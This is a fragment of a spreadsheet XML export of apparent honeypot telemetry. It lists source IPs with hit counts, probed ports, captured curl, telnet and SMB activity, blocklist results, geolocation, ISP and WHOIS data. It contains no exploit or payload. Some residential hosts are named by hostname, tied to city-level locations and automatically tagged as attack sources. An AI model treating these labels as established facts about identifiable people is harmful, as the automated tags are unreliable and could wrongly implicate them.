    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;41533&amp;&amp;41556&amp;&amp;41545&amp;&amp;41579&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7221:1d95"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3446"/>
    <x v="3446"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:46:13"/>
    <d v="2025-03-05T15:24:06"/>
    <d v="2025-04-03T01:46:13"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (A Block)"/>
    <s v="7279746"/>
    <s v="201301"/>
    <s v="28.6308"/>
    <s v="77.3821"/>
    <s v="134926"/>
    <s v="Micro Hosting Private Limited"/>
    <s v="MicroHost Cloud"/>
    <s v="hosting"/>
    <s v="MicroHost"/>
    <s v="2018-12-11"/>
    <s v="MICROHOST1-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.127.31.138,50195)}&amp;&amp;{Data_SMB:Incoming connection (103.127.31.138,50954)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:677f:1f8a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3447"/>
    <x v="3447"/>
    <s v="pool-173-49-75-75.phlapa.fios.verizon.net"/>
    <x v="0"/>
    <d v="2025-04-03T01:39:08"/>
    <d v="2024-12-31T09:33:37"/>
    <d v="2025-04-03T01:39:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="80&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="PA"/>
    <s v="Pennsylvania"/>
    <s v="Philadelphia"/>
    <s v="Philadelphia"/>
    <s v="4560349"/>
    <s v="19099"/>
    <s v="39.9526"/>
    <s v="-75.1652"/>
    <s v="701"/>
    <s v="Verizon Business"/>
    <s v="Verizon Business"/>
    <s v="residential"/>
    <s v="Verizon Business"/>
    <s v="2008-10-09"/>
    <s v="VIS-BLOCK"/>
    <s v="2022-05-31"/>
    <s v="connection"/>
    <s v="{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1999-07-06 22:06:59"/>
    <s v="2025-07-06 22:06:59"/>
    <s v="2024-01-30 15:46:59"/>
    <s v="['NS1.VERIZON.NET', 'NS2.VERIZON.NET', 'NS3.VERIZON.NET', 'NS4.VERIZON.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="38"/>
    <s v="NA"/>
    <s v="1300 I Street NW Suite 500 East"/>
    <s v="::ffff:ad31:4b4b"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3448"/>
    <x v="3448"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:29:59"/>
    <d v="2024-09-09T06:03:00"/>
    <d v="2025-04-03T01:29:59"/>
    <n v="93"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;65097"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b1bc"/>
    <s v="None&amp;&amp;C-U&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3449"/>
    <x v="3449"/>
    <s v="176-35-142-195.xdsl.murphx.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:29:41"/>
    <d v="2023-10-07T22:18:00"/>
    <d v="2025-04-03T01:29:41"/>
    <n v="1817"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;65018&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="East Sussex"/>
    <s v="Hastings"/>
    <s v="2647356"/>
    <s v="NA"/>
    <s v="50.8557"/>
    <s v="0.58009"/>
    <s v="5413"/>
    <s v="Daisy Corporate Services Trading Ltd"/>
    <s v="Daisy Corporate Services Trading Ltd"/>
    <s v="residential"/>
    <s v="Daisy"/>
    <s v="2011-05-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2001-02-10 19:29:01"/>
    <s v="2026-02-10 19:29:01"/>
    <s v="2025-01-20 09:14:25"/>
    <s v="['AUTH1.DNS.GXN.NET', 'AUTH2.DNS.GXN.NET', 'AUTH3.DNS.GXN.NET', 'AUTH4.DNS.GXN.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b023:8ec3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3450"/>
    <x v="3450"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:20:53"/>
    <d v="2025-04-03T01:20:53"/>
    <d v="2025-04-03T01:20:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:969f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3451"/>
    <x v="3451"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:19:45"/>
    <d v="2025-04-03T01:19:45"/>
    <d v="2025-04-03T01:19:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:e373"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3452"/>
    <x v="3452"/>
    <s v="220-133-146-225.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:17:58"/>
    <d v="2024-12-16T09:33:59"/>
    <d v="2025-04-03T01:17:58"/>
    <n v="315"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23&amp;&amp;24934&amp;&amp;55342&amp;&amp;20567&amp;&amp;49344&amp;&amp;49472&amp;&amp;49512&amp;&amp;49548&amp;&amp;49591&amp;&amp;49662&amp;&amp;49672&amp;&amp;49566&amp;&amp;49680&amp;&amp;49695&amp;&amp;49704&amp;&amp;80"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:92e1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3453"/>
    <x v="3453"/>
    <s v="220-132-54-11.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:15:45"/>
    <d v="2024-09-12T00:18:00"/>
    <d v="2025-04-03T01:15:45"/>
    <n v="456"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;63671"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:360b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3454"/>
    <x v="3454"/>
    <s v="1-34-43-114.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:12:44"/>
    <d v="2024-03-02T12:17:00"/>
    <d v="2025-04-03T01:12:44"/>
    <n v="21703"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;80&amp;&amp;40816&amp;&amp;23&amp;&amp;20266&amp;&amp;9100"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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122:2b72"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3455"/>
    <x v="3455"/>
    <s v="59-126-168-111.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T01:12:11"/>
    <d v="2023-07-25T15:31:06"/>
    <d v="2025-04-03T01:12:11"/>
    <n v="1404"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_HTTP_H32&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;49745&amp;&amp;30116&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login"/>
